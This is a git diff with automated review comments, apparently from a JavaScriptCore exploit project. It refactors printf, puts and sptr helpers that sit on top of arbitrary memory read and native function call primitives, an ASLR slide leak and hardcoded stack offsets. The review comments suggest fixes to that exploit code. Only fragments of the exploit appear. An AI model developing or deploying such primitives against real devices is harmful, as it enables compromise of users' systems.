Diffstat (limited to 'src')
| -rw-r--r-- | src/gen/main.c | 3 | ||||
| -rw-r--r-- | src/js/lib/myutils.js | 23 | ||||
| -rw-r--r-- | src/js/main.js | 16 | ||||
| -rw-r--r-- | src/js/primitives/mem.js | 13 |
4 files changed, 39 insertions, 16 deletions
diff --git a/src/gen/main.c b/src/gen/main.c
index 3c8d513..5d6be0a 100644
--- a/src/gen/main.c
+++ b/src/gen/main.c
@@ -10,6 +10,7 @@
 #include <unistd.h>
 #include <string.h>
 #include <stdio.h>
+#include <dlfcn.h>
 #include "stage1_primitives.h"
 #include "stage0_primitives.h"
@@ -202,6 +203,8 @@ int main(int argc,
 fprintf(fp, "# - with love from spv <3\n");
 fprintf(fp, "\n");
+ fprintf(stderr, "0x%x\n", RTLD_DEFAULT);
+
 uint32_t stack_base = 0x1c7738; // my shell setup
 // uint32_t stack_base = 0x1c7c88; // my 4s shell setup
 // uint32_t stack_base = 0x1c2e48; // my lldb
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index 80d4d9b..38b85b8 100644
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -1,9 +1,28 @@
 function puts(s) {
- return calls4arg("puts\0", sptr(s + "\0"), 0, 0, 0);
+ return calls4arg("puts\0", sptr(s), 0, 0, 0);
 }
 function printf() {
+ if (arguments.length > 4) {
+ return printf("warning: tried to printf with %d args, max %d.\n", arguments.length, 4);
+ }
+
+ var args_to_pass = new Array();
+
+ args_to_pass.push("printf");
+
 for (var i = 0; i < arguments.length; i++) {
- puts(arguments[i]);
+ if (arguments[i].constructor === String) {
+ args_to_pass.push(sptr(arguments[i]));
+ } else {
+ args_to_pass.push(arguments[i]);
+ }
 }
+
+ var count_to_me = 5 - arguments.length;
+ for (var i = 0; i < count_to_me; i++) {
+ args_to_pass.push(0);
+ }
+
+ return calls4arg.apply(this, args_to_pass);
 }
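Review bot: The added `fprintf(stderr, "0x%x\n", RTLD_DEFAULT);` hands a pointer constant to a `%x` conversion, which expects an unsigned int, so this is a format/argument mismatch that -Wformat will flag and that prints only part of the value on a 64-bit build. Since RTLD_DEFAULT is a compile-time constant this looks like a debugging leftover; if it is meant to stay, print it with the pointer conversion, `fprintf(stderr, "%p\n", RTLD_DEFAULT);`, or drop the line. The enclosing main() starts and ends outside the hunk.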
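Review bot: The padding in `var count_to_me = 5 - arguments.length;` fills args_to_pass to five values after the symbol name, while every calls4arg call visible in this diff, including the `puts` wrapper in the same hunk, passes exactly four after the name; unless calls4arg ignores a surplus trailing argument this is off by one and should read `var count_to_me = 4 - arguments.length;`. The type test `arguments[i].constructor === String` throws on a null or undefined argument, where `typeof arguments[i] === "string"` would simply fall through to the numeric branch. The symbol is pushed as `"printf"` here while the sibling wrapper keeps `"puts\0"` and mem.js still passes `"printf\0"`, so whether calls4arg needs the terminator on the name cannot be told from this diff and should be settled in one place rather than per caller.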
\ No newline at end of file
diff --git a/src/js/main.js b/src/js/main.js
index e040d05..4c29430 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -37,20 +37,14 @@ function main() {
 puts("we out here");
 puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
- log("slide=0x" + slide.toString(16));
- log("*(uint8_t*)base = 0x" + read_u8(base).toString(16));
- log("*(uint16_t*)base = 0x" + read_u16(base).toString(16));
- log("*(uint32_t*)base = 0x" + read_u32(base).toString(16));
-
- predicted_jsobject_addy = 0x422200;
- buf = read_buf(predicted_jsobject_addy, 0x200);
-
- log("hexdump of predicted jsobject loc:");
- log(hexdump(buf, 8, 2, predicted_jsobject_addy, 8, "0x"));
+ printf("slide=0x%x\n", slide);
+ printf("*(uint8_t*)base = 0x%x\n", read_u8(base));
+ printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
+ printf("*(uint32_t*)base = 0x%x\n", read_u32(base));
 var i = 0;
 while (true) {
- calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0);
+ calls4arg("syslog", 0x28, sptr("get rekt from jsc %d (slide=%x)\n"), i, 0);
 calls4arg("sleep", 0, 0, 0, 0);
 i++;
 }
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index b0746b4..551b59f 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -169,16 +169,16 @@ function init_sptr_heap() {
 sptr_size = 0x1000000;
 sptr_len = 0;
- calls4arg("printf\0", sptr("sptr_heap=%p\n\0"), global_sptr_addy, 0, 0);
+ calls4arg("printf\0", sptr("sptr_heap=%p\n"), global_sptr_addy, 0, 0);
 return global_sptr_addy;
 }
 /*
- * sptr is meant to give you a pointer to a specified string
+ * _sptr is meant to give you a pointer to a specified string
 * remember your nul's!
 */
-function sptr(s) {
+function _sptr(s) {
 if ((sptr_len + s.length) >= sptr_size) {
 /*
 * expand sptr heap if it's too small
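Review bot: Dropping the terminator in `calls4arg("syslog", 0x28, sptr("get rekt from jsc %d (slide=%x)\n"), i, 0);` changes what is written for the symbol name, while init_sptr_heap in this same diff keeps `"printf\0"` and the puts wrapper keeps `"puts\0"`; the hunk does not show how calls4arg materialises the name, and if it uses the same write_str path as _sptr with no terminator of its own, "syslog" would be resolved with whatever bytes follow it. Until calls4arg is known to append the NUL itself, keeping `"syslog\0"` here matches the other callers; once it does, strip the terminator from all of them in one change. main() starts and continues outside the hunk.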
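Review bot: After the rename, the header comment on `_sptr` still reads as if it were the public entry point and says only "remember your nul's!", so nothing tells a reader that the leading underscore marks the raw, unterminated variant. I would replace that line with `* raw variant: writes s exactly as given, no terminator appended; use sptr() unless you already added one`. The _sptr body runs past the end of the hunk.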
@@ -198,4 +198,11 @@ function sptr(s) {
 write_str(global_sptr_addy, s);
 global_sptr_addy += s.length;
 return global_sptr_addy - s.length;
+}
+
+/*
+ * sptr but with nul
+ */
+function sptr(s) {
+ return _sptr(s + "\0");
 }
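Review bot: The tail of `_sptr` advances `global_sptr_addy += s.length;` but nothing in the visible lines updates sptr_len, the counter that the heap-full guard at the top of _sptr compares against sptr_size; if the unseen middle of the function does not increment it either, that guard never fires and writes run past the reserved region. If so, add `sptr_len += s.length;` beside the pointer bump. The new `sptr` wrapper would also benefit from stating its contract, e.g. `/* sptr: like _sptr but appends the terminating "\0" for you, so pass plain JS strings */`. _sptr starts before the hunk.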
\ No newline at end of file |
